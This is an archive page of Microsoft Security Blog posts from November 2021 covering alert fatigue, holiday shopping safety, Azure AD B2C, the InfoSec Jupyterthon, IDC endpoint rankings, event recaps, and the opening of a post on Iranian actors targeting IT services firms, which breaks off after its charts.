Archive

Archive for the ‘cybersecurity’ Category

How Red Canary and Microsoft can help reduce your alert fatigue

November 29th, 2021 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog seriesLearn more about MISA.

Security alert fatigue

Organizations often feel overwhelmed by the number of security alerts they receive. Frustrated by alert fatigue, these organizations want a deeper understanding of security threats and extended coverage to protect themselves. Enterprises typically maintain 70 security products from 35 different vendors1 and burnout from alert fatigue can lead to choices that put a company’s security at risk. Prospective customers have told us they mute security alerts or create rules to ignore or turn off alerts. Some security operations leaders have even said that if a security alert isn’t resolved within a week, it’s automatically deleted from the system.

Security alert fatigue happens when employees become desensitized to alerts and alarms from tools and technology because of their frequency. Since 2019, the number of security alerts has increased by 34 percent.2 In fact, 44 percent of alerts go uninvestigated1 because of the high volume and inadequate staff levels.

Red Canary is a security ally for customers

Security alerts lack the context customers need to determine which alerts are a serious threat and which are noise. They also wonder, “If we were attacked, how fast could we contain a security threat?” Security alerts don’t answer this question. That’s why Red Canary, a cybersecurity software as a service (SaaS) company that provides outcome-focused solutions for security operations teams, developed a security operations platform that powers their Managed Detection and Response (MDR) solutions. Red Canary MDR integrates with Microsoft Defender for Endpoint to help customers detect and respond to cybersecurity threats in their environment. Red Canary MDR + Microsoft Defender for Endpoint is a powerful combination for modern security operations teams to protect their organizations.

Founded in 2014, Red Canary is a security ally for customers and an extension of their security teams. Underpinning Red Canary’s MDR solution is its all-day security operations team. These detection engineers provide extended coverage for long-term customer peace of mind. Red Canary is continuously monitoring and reviewing every potential threat—even detections that appear outwardly benign are investigated.

Red Canary’s approach

When its MDR solution detects a security threat for one customer, a logic-based detection engine is strengthened and used to detect similar threats for other customers. Thousands of detectors—a number that is growing all the time—trigger investigations on anything suspicious that’s detected.

Red Canary’s solution supercharges the already powerful Microsoft Defender for Endpoint and also now supports Microsoft Defender for Identity, to help security operations teams protect on-premises identities, and Microsoft Azure Active Directory (Azure AD) Identity Protection, to protect identities and user accounts for Azure AD customers along with recently announced support for publishing confirmed detections into Microsoft Sentinel.

The Red Canary technology is only half the story. Customers also benefit from the deep threat detection expertise with detection engineers and incident handlers available around the clock, serving as an extension of a customer’s security team.

We increase the confirmed detections and tune down the noise of security alerts.”—Cordell BaanHofman, General Manager, Red Canary + Microsoft Security at Red Canary

Red Canary by the numbers: 20,000 endpoints, 51 billion telemetry records, 69,886 tipoffs, 3,943 significant events, 74 detections, and 17 high-severity attacks.

Bridging the expertise and budget gap

Besides alert fatigue, companies also struggle with two other big challenges that restrict their ability to respond to cyberthreats: a lack of cybersecurity expertise and a limited budget. Many organizations lack the in-house expertise to review, investigate, and respond to Microsoft Defender for Endpoint security threats. Often, budget prevents them from hiring people with the expertise to operationalize Microsoft Defender for Endpoint or provide all-day coverage.

Red Canary supports these companies by giving them access to a team of cybersecurity experts and all-day coverage. It offers them an “easy button,” including customizable, automated incident response playbooks which enhance the pre-built automated incident response model of Microsoft Defender for Endpoint. Red Canary’s approach to threat detection continues to effectively protect its customer base from ransomware—like the Conti and REvil families that have been implicated in so many prominent attacks this year—and other high-impact threats.

The company analyzes alerts and raw telemetry through APIs connected to Microsoft Defender for Endpoint. Customers are only notified of confirmed threats—in the middle of the night if it’s a critical threat—and are provided with full threat context to quickly respond to stop it in its tracks. This response is achieved through a combination of automation and incident response experts to neutralize and remove the threat.

Flow chart from Microsoft Defender for Endpoint to Red Canary security operations center to customer security team and back.

After brining in Red Canary, an IT security leader said they felt positively about their security posture for the first time in their 10-year information security career. A security analyst at a different company said the solution results in every detection being actionable and reliable. The security analyst explained: “Red Canary has taken what used to be a daily workload of hours and brought it down to minutes.”

MISA membership

Red Canary is aligned with Microsoft’s security strategy, particularly extended detection and response (XDR) and the Zero Trust approach. Since becoming an inaugural MDR partner in 2019, Red Canary earned IP co-sell incentive status and shared the virtual stage at Microsoft Ignite with Microsoft Corporate Vice President Rob Lefferts during his advanced attack security keynote.

Red Canary was one of the early members of the Microsoft Intelligent Security Association (MISA), joining in January 2019, and has participated in Microsoft webinars, blog posts, and marketing workshops—all made possible by MISA.

Learn more

One of the reasons that Red Canary and Microsoft’s relationship is so strong is the two companies share a similar ethos and objective. Red Canary’s mission is to empower organizations worldwide to make their greatest impact without fear of a cyberattack. Microsoft’s mission is to empower every person and every organization on the planet to achieve more. Reach out for a demonstration of Red Canary MDR + Microsoft Defender for Endpoint.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


16 strategies to reduce cybersecurity alert fatigue in your SOC, Innocent Wafula, Microsoft. 17 February 2021.

2SOC Teams Burdened by Alert Fatigue Explore XDR, Joan Goodchild, Dark Reading. 14 May 2021.

The post How Red Canary and Microsoft can help reduce your alert fatigue appeared first on Microsoft Security Blog.

Stay safe online this holiday shopping season with tips from Microsoft

November 23rd, 2021 No comments

You may have already noticed this holiday shopping season feels different than those we’ve had before. Headlines about supply chain issues, worker shortages, costs rising—all while the pandemic continues to impact our lives. In my own inbox, I saw emails from brands touting Black Friday sales as early as October! An attempt to get ahead of any shipping delays that are widely expected to impact the holiday season. It’s no surprise that according to a recent Microsoft survey,1 at least 63 percent of holiday shopping will be done online.

While we all grapple with these challenges and what they mean for our holiday traditions and celebrations, there is another group that is evaluating what it means for them—hackers. We know bad actors aim to understand the psychology of their victims—what tricks will they fall for and what vulnerabilities they have. And this year, there are some new areas around which we all need to be extra vigilant. Luckily, if we are aware and take simple steps to protect ourselves, we can all have peace of mind this season.

Shoppers’ concerns

According to our survey, price and availability are the two most important things shoppers are considering this year. We know price is always at the top of the list for most shoppers, but availability is a newer concern for most this year. If you’re already worried about getting gifts in time, you are certainly not alone—54 percent of people report they are worried about supply chain issues. And one in five are willing to go to a third-party seller, like auction or resale sites, to get their must-have holiday gifts.

Less than half of those surveyed say they consider the safety and security of their personal information when shopping online—while I’m glad to see that it’s in the consideration set, that means more than half aren’t even thinking about it. Luckily there are a few simple things that can set us all on a path to a safer shopping experience.

The holiday shopping season presents security challenges with 63 percent taking place online this year. You can learn how to protect yourself online this year on Microsoft Security's blog.

Fortify ahead of time

Before you start making purchases, look at the things you can do now to keep yourself more secure. We know that weak passwords are the entry point for most attacks—and there are a whopping 579 password attacks every second! Stop keeping track of your passwords and look to more secure alternatives.

  • Turn on multifactor authentication: If an account or service offers multifactor authentication (MFA), turn it on. If someone else tries to log into your account, you will be able to thwart the attempt when you are notified with a text, email, or other chosen method. MFA can block over 99 percent of password attacks.
  • Use free, trusted tools: Microsoft Edge offers several free features to keep you safe while shopping online. Should any of your saved logins become compromised, Password Monitor will notify you, allowing you to quickly change your password with the new one-click Easy Update feature in Edge. Password Generator automatically generates a strong, unique password suggestion each time you need one, as you create accounts to get all those great holiday deals.
  • Delete your password altogether: Where possible, remove your password completely and choose an alternate, more secure form of authentication. We make it easy to remove your password from your Microsoft account—not only is it more secure, you never need to worry about forgetting or changing a password. Learn how to go passwordless here: The passwordless future is here for your Microsoft account.

Don’t fall for too-good-to-be-true offers

With so many people worried about availability, we all need to be extra vigilant about scams that may prey on our desires to get the gifts our loved ones want. It can be easy to get tunnel vision and when we see an ad for what we want with a “guaranteed delivery” offer. It might be tempting to go for it even if it’s a site we aren’t sure we can trust. But keep in mind, most offers that seem too good to be true are just that.

People are still falling victim to online scams like buying a fake digital gift card or making a purchase from what turned out to be a fake company. In fact, one in four have admitted to buying an item and receiving something that didn’t match the online description at all. Imagine thinking you’re getting the most popular toys of the holiday season only to get something that is more scary than merry.

And if you think that email offering extreme discounts or availability for an item that is sold out everywhere else seems a bit phishy, you may be right. Before you click, hover over any suspicious links to see if the web address matches what’s mentioned in the message. Look for any weird spellings, extra letters, or other telltale signs. When in doubt, go to the retailer website directly and see if the offer checks out. Learn more tips to spot phishing here:

These are just a few simple things you can do to help make your holiday shopping more secure, but the most important is #BeCyberSmart! Educate yourself, your family, and your friends about the threats out there and how to protect yourself. This helps us all be more vigilant and makes the world a little safer every day. To help you learn more about cybersecurity safety, visit our cybersecurity education resource center.

We’ll share more tips this holiday season—and be sure to check out what our colleagues at RiskIQ have to say about keeping e-commerce sites secure for holiday shopping.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Happy holidays!

 


1Data is from YouGov Omnibus among a sample of 2,010 adults in the US and was collected between 3 to 5 of November 2021. The survey was carried out online and data have been weighted to be representative of all US adults (aged 18 plus).

The post Stay safe online this holiday shopping season with tips from Microsoft appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

MVP Health Care secures member portal access with Microsoft Azure Active Directory B2C

November 23rd, 2021 No comments

Hello! I’m Sue Bohn, Microsoft Vice President of Program Management for Identity and Network Access. In today’s Voice of the Customer blog post, Chief Technology Officer and Chief Information Security Officer David Swits of MVP Health Care shares how Microsoft Azure Active Directory B2C helped the organization modernize and simplify portal authentication.

MVP Health Care modernizes and simplifies the way members gain access to health plan information

As both Chief Technology Officer and the Chief Information Security Officer at MVP Health Care, I believe you must design your technology solutions with security as the foundation and then overlay the functionality. When building online portals to be accessible to four groups—individual members, employers, healthcare providers, and brokers—MVP Health Care prioritized security as much as ease of use and the user experience (UX). After all, stolen healthcare data is highly prized by cybercriminals, and we have a duty to protect members’ information.

MVP Health Care is a regional, not-for-profit health plan with 700,000 members and 1,700 employees in New York and Vermont. When I joined in 2018, the company was eight to nine years behind on technology. Our objective was to embark on digital transformation so the company could more easily and efficiently serve our constituents. As a Microsoft-first organization, that meant turning to Microsoft technology as we reinvented our infrastructure and replaced our traditional authentication methods with Azure Active Directory (Azure AD) External Identities for B2C user journeys.

The technology running previous portals was antiquated and cumbersome

Comparing healthcare plans can be confusing. We knew we had data that could make it easier. To do that, our portals needed to cut through complexity and deliver the right content for each constituent group.

The old portals—fueled by the IBM WebSphere Application Server—were cumbersome to use and support. MVP Health Care developers sometimes had to go through the back-end to fix an account. No back-end identity process existed to authenticate people who needed to access a portal, so anyone could create an identity for anyone.

Partner Edgile becomes an extension of MVP Health Care’s team

We considered augmenting what we already had with biometrics features, but those plugins didn’t mesh well with our infrastructure. In 2018, we brought on Edgile as a partner and shared our Zero Trust security approach—assuming breach and giving people the least privileged access possible. With extensive knowledge of Azure AD B2C, Edgile designed the identity infrastructure around the new portal and trained our team on best practices.

Edgile built B2C custom policies with user flows, such as seamless single sign-on and self-service password reset. Single sign-on lets people access all their apps after signing in once, while self-service password reset enables people to unlock or reset their passwords without the help desk. To preserve the user accounts from MVP’s previous identity provider, Edgile designed a migration path for users to move to Azure AD B2C the first time they signed in.

Microsoft provided feature previews to Edgile and worked with an MVP Health Care developer to port the UX designs into the HTML, JavaScript, and cascading style sheets (CSS) to refine the experience. A collection of Azure functions and a .NET Core RESTful web application from Edgile helped maintain data synchronization and the execution of complex operations.

“Edgile teamed up really well with MVP Health Care expertise in identity management including external identity management. We started first with a strategy that was followed by a successful quickstart/proof of concept that led to the broader implementation.”—Tarun Vazirani, Edgile Account Partner

Custom policies help create user journeys

MVP Health Care leveraged the custom policies, which are configuration files that define the behavior of MVP’s Azure AD B2C tenant user experience. While user flows are predefined in the Azure AD B2C portal for the most common identity tasks, a custom policy can be edited by an identity developer to be fully configurable and policy-driven. It orchestrates trust between entities in standard protocols, including OpenID Connect, OAuth, and SAML, and a few non-standard ones like REST API–based system-to-system claims exchanges. The framework creates user-friendly, white-labeled experiences to:

  • Federate with other identity providers.
  • Address first- and third-party multifactor authentication challenges.
  • Collect user input.
  • Integrate with external systems using REST API communication.

Each user journey is defined by a policy. One can build as many or as few policies as required for the best user experience.

Microsoft’s identity experience framework

Figure 1: Microsoft’s identity experience framework.

A more unified and streamlined customer experience

Three portals have launched—with the provider portal expected to go live soon. Members appreciate the simpler, modern way they access their portal.

We now have modern authentication that integrates with modern technology. We can easily connect to Google, Facebook, and other verification methods. The experience is familiar for MVP Health Care’s constituents because it’s the same as the graphical interface they see elsewhere.

Together, all the features of Azure AD add huge value. Azure AD multifactor authentication and Conditional Access support Zero Trust’s baseline security. We’re audited on how well we protect confidential information. Multifactor authentication requires identity verification, such as entering a code sent to a phone. Conditional Access policies are if-then statements for how someone gains access.

On launch day, I tested the capabilities of Azure AD B2C and the new portals. I’ll never forget that feeling of knowing we’d chosen our technology wisely. It was slick. It was effective. It was fast. And it’s been an incredible asset for our organization ever since.

Voice of the Customer: Looking ahead

Many thanks to David for sharing MVP Health Care’s story. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers’ security and implementation insights more broadly. Bookmark the Microsoft Security blog so you don’t miss the next in this series!

To learn more about Microsoft Security solutions visit our website. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post MVP Health Care secures member portal access with Microsoft Azure Active Directory B2C appeared first on Microsoft Security Blog.

Join us at InfoSec Jupyterthon 2021

November 19th, 2021 No comments

We’re excited to invite our community of infosec analysts and engineers to the second annual InfoSec Jupyterthon taking place on December 2-3, 2021. This is an online event organized by our friends in the Open Threat Research Forge, together with folks from the  Microsoft Threat Intelligence Center (MSTIC).

Although this is not a Microsoft event, our Microsoft Security teams are delighted to be involved with helping organize it and deliver talks and workshops. Registration is free and it will be streamed on YouTube Live both days from 10:30 AM to 8:00 PM Eastern Time.

Illustration of Jupyter, tools, and community

Figure 1. InfoSec Jupyterthon 2021 event image. This image was created by Scriberia for The Turing Way community and is used under a CC-BY licence. Zenodo record.

What is InfoSec Jupyterthon?

InfoSec Jupyterthon is a forum for information security analysts and engineers to share knowledge and experiences about using Jupyter notebooks in security hunting and investigation. Last year’s conference featured talks on a variety of topics, from integrating notebooks into your security operations (SOC) processes to using GPU-accelerated graphs, time series decomposition, and pandas statistics to detect and understand attacker patterns.

Since many of last year’s attendees identified themselves as Jupyter notebooks beginners, this year’s conference will feature a series of beginner and intermediate tutorials during the mornings, covering notebooks, data analysis with pandas, visualization and using MSTIC’s infosec Python package MSTICPy. The afternoons will host speakers on a variety of notebook and info security topics, including:

  • Automating notebook execution
  • Using notebooks with Apache Spark
  • Using notebooks in incident response

What is Jupyter and why is it relevant to infosec?

Jupyter notebooks are a hybrid environment that combine code, data analysis, and visualization in a single document. Jupyter is widely used by scientists and data analysts. Some of the characteristics that make Jupyter a great platform for more advanced threat investigations are:

  • Data agnostic – you can bring data from (almost) anywhere into your analysis
  • Centralization – you can combine code, formatted text, visuals in a single document
  • Flexible structure – it’s easy to add and remove sections as needed
  • Repeatable processes – you can save and run the same notebook on different inputs and/or criteria
  • Instant reporting – you can save a notebook as a PDF or HTML page

Screenshot of a sample Jupyter notebook process tree

Figure 2: A sample visualization of a process tree generated in a Jupyter notebook.

If you ever find yourself limited by your SIEM but don’t want to break into full-blown development mode, Jupyter notebooks could be what you’re looking for. You can read more about the benefits of using Jupyter in information security in this article.

Microsoft Sentinel includes a Jupyter notebooks feature that utilizes open APIs to power advanced investigations and hunting. Notebooks are also featured in several other Microsoft services such as Azure Data Studio and Azure Machine Learning. Google’s Colab and Amazon’s Sagemaker also have a big following, making Jupyter notebooks a popular tool with broad support and a variety of use cases.

We’re looking forward to seeing you at InfoSec Jupyterthon 2021, December 2-3, 2021 from 10:00 AM to 8:00 PM Eastern Time. To attend, make sure to register for the event. You will get an email confirming your registration and well as additional information about the agenda, schedule, and workshop instructions.

To stay up to date on Microsoft’s latest security research and threat intelligence insights, make sure to read our blog.

 

The post Join us at InfoSec Jupyterthon 2021 appeared first on Microsoft Security Blog.

Microsoft named a Leader in IDC MarketScape for Modern Endpoint Security for Enterprise and Small and Midsize Businesses

November 18th, 2021 No comments

The security stakes have never been higher and, consequently, the protection of endpoints as a key component of any extended detection and response (XDR) strategy has never been more critical—for organizations of all sizes. Microsoft is thrilled to be recognized as a Leader in IDC’s MarketScape reports for Modern Endpoint Security for both enterprise1 and small and midsize businesses (SMB).2

The IDC MarketScape recognized Microsoft’s commitment to cross-platform support with Microsoft Defender for Endpoint, noting that “As telemetry is the rocket fuel for AI- and machine learning-infused endpoint security solutions, Microsoft’s breadth and volume are unequaled geographically and across customer segments (enterprise, small and midsize businesses, and consumer). With the support of macOS, iOS, and Android, Microsoft’s telemetry pool is expanding and diversifying. Microsoft’s expanded platform support also chips away at the long-standing advantage of endpoint security independent software vendors (ISVs).”

Microsoft’s vision for XDR was also cited as a differentiator, as Microsoft Defender for Endpoint is a key component of Microsoft 365 Defender, extending protection from devices to a single, integrated solution across all assets. “Microsoft’s strategic vantage point is more than its Windows operating system. Directory service of Active Directory, web browser of Microsoft Edge, and the ubiquitous business productivity apps of Office 365 provide Microsoft native visibility and control across common endpoint attack vectors. These security building blocks available through Microsoft licensing agreements (E3 and E5) and as standalone options have contributed to Microsoft’s market strength and momentum in modern endpoint security.”

Security for all

Everyone expects hackers to target big, lucrative targets. Modern endpoint security is a key component for any XDR strategy for enterprise security teams, along with identity, email, application, and cloud security protection. However, small businesses are also a popular target even if they are less prevalent in the headlines.

According to a recent SMB cybersecurity report, 55 percent of SMBs have experienced a cyberattack. Many SMB companies hold valuable information that can be exploited, such as customer and employee personal information, payment information, and more. Next-generation threats, like human-operated ransomware, are a danger to organizations of all sizes but are too rarely addressed by traditional endpoint protection platform (EPP) solutions.

As part of our commitment to security for all, Microsoft has renewed its pledge to bring enterprise security to SMBs and nonprofits, boosting cloud security programs and expanding intrusion prevention and detection tech to cover Amazon Web Services (AWS).

With the launch of Microsoft Defender for Business, Microsoft delivers capabilities such as antivirus, threat and vulnerability management, and endpoint detection and response (EDR), across a broad range of desktop and mobile platforms, including Windows, macOS, Android, and iOS.

Built on the foundation of Microsoft Defender for Endpoint, SMBs will be able to focus on addressing weaknesses that pose the highest risk to their environments, as well as to reduce attack surface with application control, ransomware mitigation, network and web protection, and firewall. The solution also provides next-generation protection (on devices and in the cloud) and automated investigation and remediation, while also allowing admins to automate workflows and integrate security data into existing solutions.

Defender for Business doesn’t require special security knowledge to install and use, and it comes with a simplified client configuration with recommended security policies enforced from the get-go

“We need to have security for all, security that protects everything,” said Vasu Jakkal, Corporate Vice President for Security, Compliance, and Identity. “Security is a team sport, after all.”

Learn More

Read more about Microsoft Defender for Business, which offers enterprise-grade endpoint protection that’s cost-effective and easy to use—designed especially for businesses with up to 300 employees.

Readers seeking complete endpoint security can learn more about Microsoft Defender for Endpoint, Microsoft’s industry-leading, cloud-powered endpoint security solution offering vulnerability management, endpoint protection, EDR, and mobile threat defense. Sign up for a free trial today.

You can download the excerpts of the following reports for more details:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

We thank our customers and partners for being on this journey with us.

 

IDC MarketScape chart for Worldwide Modern Endpoint Security for Small and Midsize Businesses Vendor Assessment. Features Microsoft in top right hand corner under Leader.
IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of information and communication technology (ICT) suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market, and business execution in the short term. The Strategy score measures alignment of vendor strategies with customer requirements in a three to five-year timeframe. Vendor market share is represented by the size of the icons.
IDC MarketScape chart for Worldwide Modern Endpoint Security for Enterprises Vendor Assessment. Features Microsoft in top right hand corner under Leaders.
IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of information and communication technology (ICT) suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market, and business execution in the short term. The Strategy score measures alignment of vendor strategies with customer requirements in a three to five-year timeframe. Vendor market share is represented by the size of the icons.

 


1IDC MarketScape: Worldwide Modern Endpoint Security for Enterprises 2021 Vendor Assessment, Doc #US48306021. November 2021.

2The IDC MarketScape: Worldwide Modern Endpoint Security for Small and Midsize Businesses 2021 Vendor Assessment, Doc #48304721. November 2021.

The post Microsoft named a Leader in IDC MarketScape for Modern Endpoint Security for Enterprise and Small and Midsize Businesses appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

Microsoft unpacks comprehensive security at Gartner and Forrester virtual events

November 18th, 2021 No comments

Every day, Microsoft is committed to maintaining comprehensive security for all across our interconnected global community. With that purpose in mind, we recently sponsored the 2021 Gartner Security and Risk Summit and 2021 Forester Security and Risk Forum, where we discussed ongoing changes in the security landscape. As a Leader in five Gartner® Magic Quadrant™ reports and eight Forrester Wave™ categories, our team was keen to share insights about new threats, the evolution of Zero Trust security, managing compliance, risk, and privacy, and building tomorrow’s talent.

Comprehensive security

Vasu Jakkal, Corporate Vice President of Microsoft Security, Compliance & Identity, speaking with Phil Montgomery, General Manager for Security Product Marketing GTM, at the 2021 Gartner Security and Risk Summit.

Vasu Jakkal, Corporate Vice President (CVP) of Microsoft Security, Compliance, and Identity, sat down with Phil Montgomery, General Manager for Security Product Marketing GTM, at the 2021 Gartner Security and Risk Summit for a wide-ranging fireside chat on the evolving state of cybersecurity. Phil started by addressing the elephant in the room—how the past 18 months have altered the security landscape in ways we’re still trying to understand.

“When the pandemic started, businesses had to become digital overnight,” Vasu points out. “With employees turning to personal devices to get the job done, that meant we had an exponential increase in the amount of digital attack surfaces. We saw an incredible increase in the sophistication and frequency of cyberattacks.” Vasu cites the attack on Colonial Pipeline as an example of how attacks have become more sophisticated and relentless in 2021. She also cites the phenomenon of cybercriminals expanding their operations by offering ransomware as a service. “Organizations are facing new economic challenges along with those brought by hybrid environments—multi-cloud and multi-platform,” she reiterates. “All these factors have come together to increase the complexity we face in cybersecurity.”

“You can’t secure a door and leave a window open. You have to think about your security posture as an interdependent whole—both external and internal threats.”—Vasu Jakkal, CVP of Microsoft Security, Compliance, and Identity

Eliminating complexity is one reason why Microsoft chose to integrate Microsoft Sentinel, our cloud-native SIEM + SOAR solution, and Microsoft Defender, our extended detection and response (XDR) tool. Integrating the two solutions simplifies detection and response by providing a bird’s-eye view of your digital estate, as well as enabling your security operations center (SOC) to investigate and resolve incidents at a granular level. “That kind of visibility and rapid response can really make a difference in the early stages of a ransomware attack,” Vasu stresses. “The reality today is if you’re connected; you’re vulnerable. The only way to protect a remote workforce is to have left-to-right and top-to-bottom security. That means security, compliance, identity, device management, and privacy are all interdependent.”

Beyond the technology, Vasu also points out: “The number one thing every security leader should be doing right now is building and practicing a plan with all essential members of your team. Do you have a great communications plan? Do you have a great response plan?” She also stressed the importance of training and empowering employees at every level of the organization to identify suspicious activity and escalate it.

Zero Trust comes of age in 2021

Nupur Goyal, Microsoft Group Product Marketing Manager for Identity Security & Zero Trust and Microsoft Corporate Vice President of Program Management Alex Simons talking at the 2021 Forrester Security & Risk Forum.

Earlier this month at the 2021 Forrester Security and Risk Forum, Microsoft CVP of Program Management Alex Simons also sat down for another fireside chat with Nupur Goyal, Microsoft Group Product Marketing Manager for Identity Security and Zero Trust. Alex also was struck by the rapid changes in enterprise security over the past 18 months. “If you think about the world we were in before [the pandemic],” he explains, “you were mostly protecting desktop PCs and laptops; most of your apps were on-premise. You didn’t have to worry about nation-state attackers. That’s why it’s important for enterprises to move away from the old perimeter-based security model to a Zero Trust approach.”

“The thing to remember about a Zero Trust approach, as the saying goes: you don’t have to eat the whole elephant at once. Just gradually expand multifactor authentication across your employees, beginning with those that have the access to the most important applications.”—Alex Simons, Microsoft CVP of Program Management

For some organizations, Zero Trust requires a big shift in thinking. It’s a mindset that assumes all activity, even by known users, could be an attempt to breach your systems. Alex cites attackers who are now targeting identities—both through users and the software itself—as a new threat to consider. “You really need a system that can look at what your users and their devices are doing,” he explains. “That includes all the software services that can access your resources. It really has to be a comprehensive approach. The workload identities, the ones that are your software, that’s a new thing. And you want to make sure you have a good plan in place for that.”

Alex recommends organizations begin by applying multifactor authentication to all privileged admin accounts. He also pointed out the importance of making sure that every device accessing your resources is well-managed. “Microsoft Endpoint Manager and Microsoft Defender for Endpoint help achieve that. You want to be sure every device is encrypted and protected with a PIN, but also you want each to be in a clean state from an antivirus standpoint.”

Roughly 76 percent of Microsoft customers have already begun Zero Trust implementation. Because we’re now in a boundary-less world of hybrid work, Zero Trust is exactly the security approach that’s needed. The foundation of Zero Trust is based on the three guiding principles: verify explicitly, use least-privilege access, and assume breach. Microsoft is building an identity platform to simplify and secure all relationships among employees, partners, customers, workloads, and smart devices—whether you’re a developer, an IT administrator, or a user. “There are 579 attacks happening every second,” Vasu adds. “So, effective security has to start with a strong identity foundation. We see identity as the ‘trust fabric’ of this new boundaryless collaboration.”

Managing compliance, risk, and privacy

For organizations across every sector, a tremendous amount of data is accessed, processed, and stored every day. This, along with an ever-growing universe of data regulations, is creating complexity and compliance risk. “We have personal data, which is in movement and in flux all the time,” Vasu explains. “The lines between work and home networks are all blurring. So that creates a lot of pressure about how to protect data, and how to ensure that all regulations are being followed.”

Many organizations use manual processes to discover how much personal data they have stored. There’s often a lack of actionable insights to help mitigate security and privacy risks. That’s why Microsoft recently announced privacy management for Microsoft 365. This new solution helps organizations identify critical privacy risks, automate privacy operations, and empower employees to be smart when they’re handling sensitive data.

For chief information security officers (CISOs) and risk officers, Vasu proposes a four-fold solution for balancing compliance and privacy: First, know your data. “Who’s accessing your data?” she asks. “How is your data moving? Do you have the right label? Do you have the right sensitivities? How are you protecting against insider risk? Do you have the right permissions level?” Second, establish a baseline of activity and measure anomalies to that baseline. You can’t just look at the world through the auditors’ eyes—pass or fail. You need to help your team see how they’re making progress. Third, partner with providers who can help you stay on top of changes in laws and regulations in all markets where you operate. Fourth, establish a collaborative process internally to address the risks when they arise. “It’s not just a security problem; it’s an organizational problem,” she stresses. That means ensuring that HR, legal, compliance, and risk teams are all working with your security operations center.

Zero Trust is not just about outside-in protection; it’s also inside-out. Organizations need to build compliance protections into processes to defend against insider threats. “You can’t secure a door and leave a window open,” is how Vasu sums it up. “You have to think about your security posture as an interdependent whole—both external and internal threats.” Organizations can take an easy first step just by implementing passwordless technologies like Windows Hello for desktops or the Microsoft Authenticator app for mobile devices.

Building tomorrow’s talent

For almost every two cybersecurity jobs in the United States today, a third job is sitting empty because of a shortage of skilled people. That’s why Microsoft is launching a national campaign with United States community colleges to help skill and recruit 250,000 people into the cybersecurity workforce by 2025:

  • Community colleges are everywhere. There are 1,044 community colleges located in every state and territory, and in every setting: urban, suburban, rural, and tribal.
  • Community colleges are more affordable. Tuition averages just $3,770 annually (versus $10,560 for four-year public colleges). Moreover, 59 percent of community college students can access financial aid.
  • Community colleges are diverse. Students at community colleges are 40 percent Black or African American or Hispanic. In addition, 29 percent are among their family’s first generation to attend college, while 20 percent are students with disabilities, and 5 percent are veterans. And 57 percent of students at community colleges are women.

“In March of this year, we announced Microsoft’s Career Connector,” Vasu explains, “a service that will help place 50,000 job seekers skilled by Microsoft’s nonprofit and learning partners in the Microsoft ecosystem over the next three years.” Career Connector has a specific focus on women and underrepresented minorities in technology. “I’m proud to report that our global skills initiative has reached more than 30 million people in 249 countries,” she adds. Microsoft is also extending through the end of 2021 all the free courses and low-cost certifications offered in our global skilling initiative through Microsoft Learn. To help fill talent gaps in compliance, Microsoft also offers certification courses for security, compliance, and identity. “No matter who you are, you can be a defender.”

The attackers in today’s asymmetric cyberwar come from all backgrounds, ethnicities, and regions. For that reason, we as defenders need to be just as diverse. “Along with diversity, inclusion goes hand in hand,” Vasu explains. “It’s important that we commit to hiring from places we may have not thought about before, to build a place where everyone feels like they belong.” She sees solving the talent shortage as a three-step process: get more people aware of cybersecurity; help them build the skills they need; and create spaces where everyone feels they can do their best work. As Vasu sees it: “Ultimately, security is all about humans. Whether you’ve been in the workforce for 30 years and want a change, or you’re just starting your career; either way, there’s a place for you here.”

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft unpacks comprehensive security at Gartner and Forrester virtual events appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust Tags:

Iranian targeting of IT sector on the rise

November 18th, 2021 No comments

Iranian threat actors are increasing attacks against IT services companies as a way to access their customers’ networks. This activity is notable because targeting third parties has the potential to exploit more sensitive organizations by taking advantage of trust and access in a supply chain. Microsoft has observed multiple Iranian threat actors targeting the IT services sector in attacks that aim to steal sign-in credentials belonging to downstream customer networks to enable further attacks. The Microsoft Threat Intelligence Center (MSTIC) and Digital Security Unit (DSU) assess this is part of a broader espionage objective to compromise organizations of interest to the Iranian regime.

Until July 2021, Microsoft had observed relatively little history of Iranian actors attacking Indian targets. As India and other nations rise as major IT services hubs, more nation state actors follow the supply chain to target these providers’ public and private sector customers around the world matching nation state interests.

To date this year, Microsoft has issued more than 1,600 notifications to over 40 IT companies in response to Iranian targeting, compared to 48 notifications in 2020, making this a significant increase from years past (Figure 1). The focus of several Iranian threat groups on the IT sector particularly spiked in the last six months – roughly 10-13% of our notifications were related to Iranian threat activity in the last six months, compared to two and a half percent in the six months prior (Figure 2). Most of the targeting is focused on IT services companies based in India, as well as several companies based in Israel and United Arab Emirates. Although different in technique from other recent supply chain attacks, these attacks represent another example of how nation state actors are increasingly targeting supply chains as indirect vectors to achieve their objectives.

Column chart showing number of notifications for 2019, 2020, and 2021

Figure 1: Number of notifications sent to IT Services related to Iran-based actor targeting

Column chart showing percentages of notifications for 4 quarters starting Oct-Dec 2020

Figure 2: Percentage of notifications per quarter sent to IT Services NSNs related to Iran-based activity

